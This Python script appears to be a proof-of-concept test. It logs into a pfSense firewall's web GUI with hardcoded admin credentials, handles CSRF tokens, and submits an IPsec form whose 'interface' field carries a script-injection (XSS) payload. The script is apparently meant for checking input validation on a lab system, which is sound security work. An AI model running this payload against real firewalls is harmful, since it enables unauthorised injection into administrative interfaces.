#!/usr/bin/env python3
import requests
# Silence urllib3 warnings (InsecureRequestWarning included): the script below
# sends requests with TLS certificate verification switched off, which would
# otherwise emit a warning for each such request.
requests.packages.urllib3.disable_warnings()
from bs4 import BeautifulSoup

# Base URL of the firewall web GUI under test. 198.51.100.0/24 is a
# documentation range (RFC 5737); replace it with the address of the lab
# system being checked.
baseurl = 'https://198.51.100.34'

# Page that receives the form submission.
target = f'{baseurl}/vpn_ipsec_phase1.php'

# Fields for the GUI login form. The credentials are kept inline for the
# test; the '__csrf_magic' token is added at runtime.
login_data = {
    'login': 'Login',
    'usernamefld': 'admin',
    'passwordfld': 'pfsense2',
}

# Form fields posted to `target`; the '__csrf_magic' token is added at
# runtime. Key order is kept as-is because it determines the order of the
# encoded request body.
target_data = {
    "descr": "XSS Test",
    "iketype": "ikev2",
    "protocol": "inet",
    # Input under test: HTML markup where an interface name is expected.
    # A server that validates this field should reject it -- presumably
    # reported as an input error in the response (confirm on the target).
    "interface": "wan\"><script>alert('XSS')</script>",
    "remotegw": "198.51.100.254",
    "authentication_method": "pre_shared_key",
    "mode": "main",
    "myid_type": "myaddress",
    "myid_data": "",
    "peerid_type": "peeraddress",
    "peerid_data": "",
    # Test-only key material for this entry.
    "pskey": "14e1206aafd9bb66a9469c0ee1f570c60ccb283b7cca6192fecf78e1",
    "ealgo_algo0": "aes",
    "ealgo_keylen0": "128",
    "halgo0": "sha256",
    "dhgroup0": "14",
    "prfalgo0": "sha256",
    "lifetime": "28800",
    "rekey_time": "",
    "reauth_time": "",
    "rand_time": "",
    "startaction": "",
    "closeaction": "",
    "nat_traversal": "on",
    "mobike": "off",
    "ikeport": "",
    "nattport": "",
    "dpd_enable": "yes",
    "dpd_delay": "10",
    "dpd_maxfail": "5",
    "ikeid": "",
    "save": "Save",
}

# Browser-like User-Agent sent with every request.
headers = {
    'user-agent': (
        'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) '
        'Gecko/20100101 Firefox/136.0'
    ),
}

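# Upper bound (seconds) for each HTTP request, so an unreachable host fails
# the run instead of hanging it indefinitely.
_REQUEST_TIMEOUT = 30


def _csrf_token(soup):
    """Return the value of the ``__csrf_magic`` hidden input in *soup*.

    Exits with a readable message when the field is missing or empty,
    rather than failing with a ``TypeError`` on ``None['value']``.
    """
    field = soup.find('input', attrs={'name': '__csrf_magic'})
    token = field.get('value') if field is not None else None
    if not token:
        raise SystemExit('No __csrf_magic token found in response; cannot continue')
    return token


with requests.Session() as s:
    # Certificate verification is off for the whole session. Passing
    # verify=False on the first request only leaves the later POSTs on the
    # session default, so whether they verify depends on the installed
    # requests version. If the target presents a trusted certificate, set
    # this to True or to a CA bundle path.
    s.verify = False
    s.headers.update(headers)

    # Fetch CSRF token from login page
    r = s.get(baseurl, timeout=_REQUEST_TIMEOUT)
    login_data['__csrf_magic'] = _csrf_token(BeautifulSoup(r.text, 'lxml'))

    # Login
    r = s.post(baseurl, data=login_data, timeout=_REQUEST_TIMEOUT)
    soup = BeautifulSoup(r.text, 'lxml')

    # If the login form is still present, the credentials were presumably
    # rejected (confirm against the target). Stop here: an unauthenticated
    # submission would make the result below meaningless.
    if soup.find('input', attrs={'name': 'usernamefld'}) is not None:
        raise SystemExit('Login appears to have failed; check login_data')

    # Find the next CSRF token
    target_data['__csrf_magic'] = _csrf_token(soup)

    # Submit actual request
    r = s.post(target, data=target_data, timeout=_REQUEST_TIMEOUT)

    # Dump input errors from response. Listed errors mean the server
    # rejected the submitted values; an empty list presumably means the
    # entry was accepted -- verify in the GUI.
    soup = BeautifulSoup(r.text, 'lxml')
    input_errors = [item.text for item in soup.select('div.input-errors ul li')]
    if input_errors:
        print("Input errors:\n")
        for message in input_errors:
            print("* " + message + "\n")

print('Done')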
